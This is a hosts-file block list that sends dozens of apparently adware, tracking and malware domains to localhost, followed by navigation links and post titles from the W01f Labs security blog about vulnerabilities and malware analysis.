127.0.0.1 75.126.3.216
127.0.0.1 75.126.3.217
127.0.0.1 75.126.3.218
127.0.0.0 59.125.231.177:17777
127.0.0.1 75.126.3.220
127.0.0.1 75.126.3.221
127.0.0.1 75.126.3.222
127.0.0.1 772630.com
127.0.0.1 832823.cn
127.0.0.1 8749.com
127.0.0.1 888.jopenqc.com
127.0.0.1 89382.cn
127.0.0.1 8v8.biz
127.0.0.1 97725.com
127.0.0.1 9gg.biz
127.0.0.1 www.9000music.com
127.0.0.1 test.591jx.com
127.0.0.1 a.topxxxx.cn
127.0.0.1 picon.chinaren.com
127.0.0.1 www.5566.net
127.0.0.1 p.qqkx.com
127.0.0.1 news.netandtv.com
127.0.0.1 z.neter888.cn
127.0.0.1 b.myblank.cn
127.0.0.1 wvw.wokutu.com
127.0.0.1 unionch.qyule.com
127.0.0.1 www.qyule.com
127.0.0.1 it.itjc.cn
127.0.0.1 www.linkwww.com
127.0.0.1 vod.kaicn.com
127.0.0.1 www.tx8688.com
127.0.0.1 b.neter888.cn
127.0.0.1 promote.huanqiu.com
127.0.0.1 www.huanqiu.com
127.0.0.1 www.haokanla.com
127.0.0.1 play.unionsky.cn
127.0.0.1 www.52v.com
127.0.0.1 www.gghka.cn
127.0.0.1 icon.ajiang.net
127.0.0.1 new.ete.cn
127.0.0.1 www.stiae.cn
127.0.0.1 o.neter888.cn
127.0.0.1 comm.jinti.com
127.0.0.1 www.google-analytics.com
127.0.0.1 hz.mmstat.com
127.0.0.1 www.game175.cn
127.0.0.1 x.neter888.cn
127.0.0.1 z.neter888.cn
127.0.0.1 p.etimes888.com
127.0.0.1 hx.etimes888.com
127.0.0.1 abc.qqkx.com
127.0.0.1 dm.popdm.cn
127.0.0.1 www.yl9999.com
127.0.0.1 www.dajiadoushe.cn
127.0.0.1 v.onondown.com.cn
127.0.0.1 www.interoo.net
127.0.0.1 bally1.bally-bally.net
127.0.0.1 www.bao5605509.cn
127.0.0.1 www.rty456.cn
127.0.0.1 www.werqwer.cn
127.0.0.1 1.360-1.cn
127.0.0.1 user1.23-16.net
127.0.0.1 www.guccia.net
127.0.0.1 www.interoo.net
127.0.0.1 upa.netsool.net
127.0.0.1 js.users.51.la
127.0.0.1 vip2.51.la
127.0.0.1 web.51.la
127.0.0.1 qq.gong2008.com
127.0.0.1 2008tl.copyip.com
127.0.0.1 tla.laozihuolaile.cn
127.0.0.1 www.tx6868.cn
127.0.0.1 p001.tiloaiai.com
127.0.0.1 s1.tl8tl.com
127.0.0.1 s1.gong2008.com
127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com

W01f Labs

Pages

Jun 8, 2010

DOS vulnerability on Internet Browser

Jun 1, 2010

Wing FTP Server - Cross Site Scripting Vulnerability

May 14, 2010

XSS vulnerability found on D-Link Router

Dec 18, 2009

Adobe new vulnerbility APSA09-07, CVE-2009-4324

Nov 4, 2009

Counter malware analysis

Aug 7, 2009

Malware Analysis: Antivirus System PRO

Jun 10, 2009

Malware Analysis: Trojan.Dropper

w01f Labs

Blog Archive

Submission of Malware

Affiliates

Disclaimer